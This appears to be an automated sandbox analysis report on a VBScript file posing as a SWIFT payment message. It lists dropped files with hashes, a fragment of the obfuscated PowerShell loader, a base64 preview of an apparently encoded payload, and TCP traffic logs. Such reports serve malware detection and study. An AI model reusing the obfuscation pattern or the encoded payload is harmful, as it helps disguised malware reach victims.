                                                                                  SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                                                  MD5:C7F7A26360E678A83AFAB85054B538EA
                                                                                  SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                                                  SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                                                  SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):64
                                                                                  Entropy (8bit):1.1940658735648508
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nlllulbnolz:NllUc
                                                                                  MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                  SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                  SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                  SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:@...e................................................@..........

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bkw1rl1a.wur.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jnyc52hj.xmd.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_twda0fch.z0s.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upctm0t2.0yj.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Roaming\Amarantfarvers.Bip

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):429220
                                                                                  Entropy (8bit):5.9655653892781615
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:KDFYZUYn/lTIRoRRVza6kh/ny7lcVUCFkOR:KO9/6WfQh+KGCFkOR
                                                                                  MD5:3302B774280DD0F1A5FF84F05FCD4D6D
                                                                                  SHA1:E46A4DE3DDA0F4B59B0D67BAE8B97594140C7B90
                                                                                  SHA-256:3BEAD7F96E50A3703ADCEB91E9F1E2EF58E71FAEAB66E23B32A30379D9D7D05E
                                                                                  SHA-512:AD9ADB6485AE1EB629255AC76FA7BDBE94DDFA7DDDA3EAEA62D882282ED046673245DF2E9F397F3AB3DB5DAB8A957B651F96867E12E87439F8C5A421246A74FB
                                                                                  Malicious:false
                                                                                  Preview:6wLdCXEBm7sKAgwAcQGbcQGbA1wkBOsC56BxAZu5Z0q+xOsCUFLrAjCxgfHtMx70cQGbcQGbgfGKeaAw6wJEbnEBm3EBm3EBm7plzO+FcQGbcQGb6wJzcXEBmzHK6wIIIHEBm4kUC3EBm+sCzbLR4nEBm3EBm4PBBHEBm3EBm4H5tkBfAnzN6wLvy3EBm4tEJARxAZtxAZuJw3EBm+sCa2aBw/R2PQHrAvYM6wIhVbrZXfQw6wLVlesCiyqB8iRhEi7rAuWncQGbger9POYe6wJXNnEBm+sCA/zrAoMecQGb6wIVvosMEHEBm3EBm4kME+sCScxxAZtCcQGbcQGbgfqIgQQAddfrAtEs6wLLqIlcJAxxAZvrAp+5ge0AAwAA6wI57usCNT6LVCQI6wI75OsCLI6LfCQE6wIKZesCeviJ63EBm3EBm4HDnAAAAOsCCorrAg8wU3EBm+sCC2RqQOsCNx1xAZuJ63EBm3EBm8eDAAEAAABQbgJxAZvrAgyBgcMAAQAAcQGb6wJdE1NxAZtxAZuJ63EBm3EBm4m7BAEAAOsCdKFxAZuBwwQBAADrAoYZ6wIHqVPrApVUcQGbav/rAppJ6wLshIPCBXEBm+sCJk0x9usCP0VxAZsxyesCJCFxAZuLGnEBm+sCkiJB6wKpvesCf+c5HAp18usCb5JxAZtG6wJPQusC0mmAfAr7uHXb6wLRNusCl9CLRAr86wIvsusCZt0p8OsCexVxAZv/0nEBm3EBm7qIgQQAcQGb6wIqujHAcQGbcQGbi3wkDOsCvQnrAlergTQHNkrINXEBm+sC3nmDwARxAZtxAZs50HXlcQGb6wLB8In7cQGbcQGb/9dxAZvrAj5Fv69J2fB6QTK3jg4Yv02dvNPzqLyB7En0w+1HVbe73Mj3xkn04XmxQQ6m8P/xDsU1fVd8Zbc+xTVucPKFt7OKtx0HSXE7SqaHXJZJcTtKtxMxCQ+wMkjINRU6MTm3/8w3Nkq4

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:ASCII text, with very long lines (355), with CRLF line terminators
                                                                                  Entropy (8bit):5.3410206762773385
                                                                                  TrID:
                                                                                  • Visual Basic Script (13500/0) 100.00%
                                                                                  File name:Swift_Message#1234323456.vbs
                                                                                  File size:8'731 bytes
                                                                                  MD5:78a3e500aa75424e4494cc24d8d2b1f3
                                                                                  SHA1:99b288b4dc02152cedcedd4f40752d55696f8eb1
                                                                                  SHA256:24220410bffece94d6ad483d61e540ee6b0fcc2d9be690d3b03d4b2b37ba07cb
                                                                                  SHA512:e23f3d60b1e12665363c75682244c6d30d23695ae838bdff138c840ee376e52f5aff168b29f88d645f17c2eb601c4fe485d0f1222f68b56891f98d5c41c5bf28
                                                                                  SSDEEP:192:s1dltIbgm2ZXmtIjR0RvYxI+MSA/T5deSIMU6O:ulKbgm2WIjRsYK+gbNIIO
                                                                                  TLSH:3C023C09456934DD110D0FB6D8EEB5AA0E4488A7D014D5EB754A134B70F63E8D39EBBC
                                                                                  File Content Preview:.. ..Function Wavinesses ......De4 = De4 & "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndi

                                                                                  File Icon

                                                                                  Icon Hash:68d69b8f86ab9a86

                                                                                  Network Behavior

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Apr 23, 2024 07:53:27.678852081 CEST49715443192.168.2.6142.250.65.174
                                                                                  Apr 23, 2024 07:53:27.678889990 CEST44349715142.250.65.174192.168.2.6
                                                                                  Apr 23, 2024 07:53:27.679020882 CEST49715443192.168.2.6142.250.65.174
                                                                                  Apr 23, 2024 07:53:27.687125921 CEST49715443192.168.2.6142.250.65.174
                                                                                  Apr 23, 2024 07:53:27.687153101 CEST44349715142.250.65.174192.168.2.6
                                                                                  Apr 23, 2024 07:53:27.889238119 CEST44349715142.250.65.174192.168.2.6
                                                                                  Apr 23, 2024 07:53:27.889369965 CEST49715443192.168.2.6142.250.65.174
                                                                                  Apr 23, 2024 07:53:27.890847921 CEST44349715142.250.65.174192.168.2.6
                                                                                  Apr 23, 2024 07:53:27.890930891 CEST49715443192.168.2.6142.250.65.174
                                                                                  Apr 23, 2024 07:53:27.894076109 CEST49715443192.168.2.6142.250.65.174
                                                                                  Apr 23, 2024 07:53:27.894093037 CEST44349715142.250.65.174192.168.2.6
                                                                                  Apr 23, 2024 07:53:27.894529104 CEST44349715142.250.65.174192.168.2.6
                                                                                  Apr 23, 2024 07:53:27.927328110 CEST49715443192.168.2.6142.250.65.174
                                                                                  Apr 23, 2024 07:53:27.972117901 CEST44349715142.250.65.174192.168.2.6
                                                                                  Apr 23, 2024 07:53:28.088987112 CEST44349715142.250.65.174192.168.2.6
                                                                                  Apr 23, 2024 07:53:28.089051962 CEST49715443192.168.2.6142.250.65.174
                                                                                  Apr 23, 2024 07:53:28.089112043 CEST44349715142.250.65.174192.168.2.6
                                                                                  Apr 23, 2024 07:53:28.089165926 CEST44349715142.250.65.174192.168.2.6
                                                                                  Apr 23, 2024 07:53:28.089246035 CEST49715443192.168.2.6142.250.65.174
                                                                                  Apr 23, 2024 07:53:28.147687912 CEST49715443192.168.2.6142.250.65.174
                                                                                  Apr 23, 2024 07:53:28.240022898 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:28.240077972 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:28.240154028 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:28.240494967 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:28.240511894 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:28.434851885 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:28.434932947 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:28.438107967 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:28.438118935 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:28.438606024 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:28.439475060 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:28.484123945 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.197559118 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.197793007 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.203730106 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.203807116 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.216022968 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.216090918 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.223499060 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.277594090 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.277621031 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.292177916 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.292253971 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.292274952 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.297205925 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.297266960 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.297286034 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.304482937 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.304543018 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.304563046 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.313185930 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.313276052 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.313296080 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.316405058 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.316463947 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.316478014 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.318981886 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.319041014 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.319055080 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.322207928 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.322287083 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.322300911 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.325371981 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.325443983 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.325459957 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.330816984 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.333837986 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.333857059 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.336568117 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.336620092 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.336637020 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.342499971 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.345873117 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.345894098 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.350898981 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.350934982 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.351000071 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.351018906 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.353180885 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.356975079 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.383090019 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.383126020 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.383193970 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.383213997 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.383327007 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.386940956 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.391911030 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.391949892 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.391993046 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.392015934 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.392060995 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.393455029 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.395988941 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.396019936 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.396061897 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.396070957 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.396298885 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.400418997 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.400582075 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.400630951 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.400639057 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.404855013 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.404907942 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.404916048 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.409256935 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.409308910 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.409317017 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.413544893 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.413597107 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.413604021 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.418025017 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.418078899 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.418087006 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.424551964 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.424587965 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.424607038 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.424616098 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.424685001 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.428885937 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.433274984 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.433310986 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.433331966 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.433355093 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.433393955 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.437267065 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.441346884 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.441376925 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.441401958 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.441428900 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.441471100 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.445183992 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.449140072 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.449182034 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.449193001 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.449218035 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.449254036 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.452945948 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.456681013 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.456733942 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.456747055 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.456760883 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.456799030 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.460163116 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.463916063 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.463953018 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.463979006 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.463999987 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.464042902 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.467412949 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.471179962 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.471226931 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.471244097 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.473028898 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.473078966 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.473093987 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.476700068 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.476753950 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.476778030 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.480232000 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.480299950 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.480314016 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.482785940 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.482836962 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.482846022 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.485317945 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.485364914 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.485374928 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.487658978 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.487705946 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.487714052 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.490210056 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.490258932 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.490267992 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.492423058 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.492487907 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.492496014 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.494831085 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.494879007 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.494884968 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.497134924 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.497215033 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.497236967 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.499454021 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.499504089 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.499522924 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.501832962 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.501885891 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.501909971 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.505227089 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.505285025 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.505302906 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.507405996 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.507464886 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.507477045 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.507491112 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.507533073 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.509603024 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.511681080 CEST44349716142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:53:29.511718988 CEST44349716142.251.35.161192.168.2.6
